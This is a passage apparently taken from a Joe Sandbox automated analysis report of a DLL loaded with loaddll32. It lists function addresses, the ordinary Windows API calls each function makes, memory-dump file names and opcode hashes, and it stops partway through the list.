Part of subcall function 6CED0CF4: DecodePointer.KERNEL32(-00000004,?,6CED0BAA,000000FF,?,6CED1060,00000011,?,?,00000000,00000000), ref: 6CED0D7B
Part of subcall function 6CED0CF4: EncodePointer.KERNEL32(00000000,?,6CED0BAA,000000FF,?,6CED1060,00000011,?,?,00000000,00000000), ref: 6CED0D81
Part of subcall function 6CED0CF4: DecodePointer.KERNEL32(?,6CED0BAA,000000FF,?,6CED1060,00000011,?,?,00000000,00000000), ref: 6CED0D97
Part of subcall function 6CED0CF4: DecodePointer.KERNEL32(?,6CED0BAA,000000FF,?,6CED1060,00000011,?,?,00000000,00000000), ref: 6CED0DA2

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$Encode$__lock_doexit
String ID:
API String ID: 2158581194-0
Opcode ID: 78529122e2b46a8e68c069f2daa41a4ac46c1808f6e5ab6ec0525ec87f7e3659
Instruction ID: a693f1f4ff0c5a4fc78fe1c5cfb7daf00d6ec370d055f5121665c9cda9a5c2b8
Opcode Fuzzy Hash: 78529122e2b46a8e68c069f2daa41a4ac46c1808f6e5ab6ec0525ec87f7e3659
Instruction Fuzzy Hash: EEA00265BD534021F86051543C43F9825111750F05FE90054BF082C6C0E5DA225D4157

Function 6CF02438 Relevance: 1.5, APIs: 1, Instructions: 4fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE ref: 6CF02438

Memory Dump Source

Source File: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 65b36aa42775d0d210a4c5f9b698bceb3552d631280ddedf790ec85fe0f6cedd
Instruction ID: 26fe762779a3591fcf95429325cbada6da0d8d21205c5dd1e5cf42d206113a19
Opcode Fuzzy Hash: 65b36aa42775d0d210a4c5f9b698bceb3552d631280ddedf790ec85fe0f6cedd
Instruction Fuzzy Hash: EAA02233288082CB82A00028000C00232B0030B3E03020CC0F002C3E00CF200C2833F0

Function 6CF0AA40 Relevance: 1.5, APIs: 1, Instructions: 2threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 6CF0AA40

Memory Dump Source

Source File: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 94a529add9c10cab3723c14fced68e66f84783778ebd83780c9fabfe531d645f
Instruction ID: 722cb71534427c52c7d411ccd32020f1694e9ee42775a5caaa487d03dd34a069
Opcode Fuzzy Hash: 94a529add9c10cab3723c14fced68e66f84783778ebd83780c9fabfe531d645f
Instruction Fuzzy Hash:

Function 6CECA8D0 Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 6CEC9D70: OpenEventA.KERNEL32(00100002,00000000,00000000), ref: 6CEC9E10
Part of subcall function 6CEC9D70: CloseHandle.KERNEL32(00000000), ref: 6CEC9E25
Part of subcall function 6CEC9D70: ResetEvent.KERNEL32(00000000), ref: 6CEC9E2F
Part of subcall function 6CEC9D70: CloseHandle.KERNEL32(00000000,321BCB28), ref: 6CEC9E64

TlsSetValue.KERNEL32(00000023,?), ref: 6CECA91A

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$OpenResetValue
String ID:
API String ID: 1556185888-0
Opcode ID: c9dbf58d1e490997d98db9ee391d3c012cfd6a8e9ec08d3c73c9276acfbd0de2
Instruction ID: 94461e8049a4ce413304a60c1bcf177b21b8f206ad538d07f9b77d7a0c57d474
Opcode Fuzzy Hash: c9dbf58d1e490997d98db9ee391d3c012cfd6a8e9ec08d3c73c9276acfbd0de2
Instruction Fuzzy Hash: A4018F75A00144ABC700CF59C905B5ABBB8EB4A274F204B2AF825D3780D7356E0086A1

Non-executed Functions

Function 6CEC90D8 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 6CEC9102
GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 6CEC910A

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: dd03867116efb9cd43d4c093e92a77269bfb8257ad90c17feacd3712422c3611
Instruction ID: 120782ed5c4159c7105b7083ea6a2fbd0c6f675cebfe7e67d4c9a9ac9833ff9e
Opcode Fuzzy Hash: dd03867116efb9cd43d4c093e92a77269bfb8257ad90c17feacd3712422c3611
Instruction Fuzzy Hash: F1F067307083018EE714CA25C862B1EBBF4AB8D74CF60092CF5A592691D370E1818A1B

Function 6CED1A28 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,6CECD5E6,?,?,?,00000000), ref: 6CED1A2D
UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 6CED1A36

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 7cde3570cd82276994461911a8bf0a965e4a3b126d978296e8af36c1477f0989
Instruction ID: ba9c249a5b6e70024f9b92e4f91826e756f67e954afefe33c88ca3fc5081ee54
Opcode Fuzzy Hash: 7cde3570cd82276994461911a8bf0a965e4a3b126d978296e8af36c1477f0989
Instruction Fuzzy Hash: 37B0923124424CABCF902BD1D809B483F38EB0A6A2F000810F60D440608FB25510BAA2

Function 6CEC775F Relevance: 1.9, Strings: 1, Instructions: 634COMMON

Download Yara Rule

Strings

|~l, xrefs: 6CEC798B, 6CEC7B5F, 6CEC7CFA

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
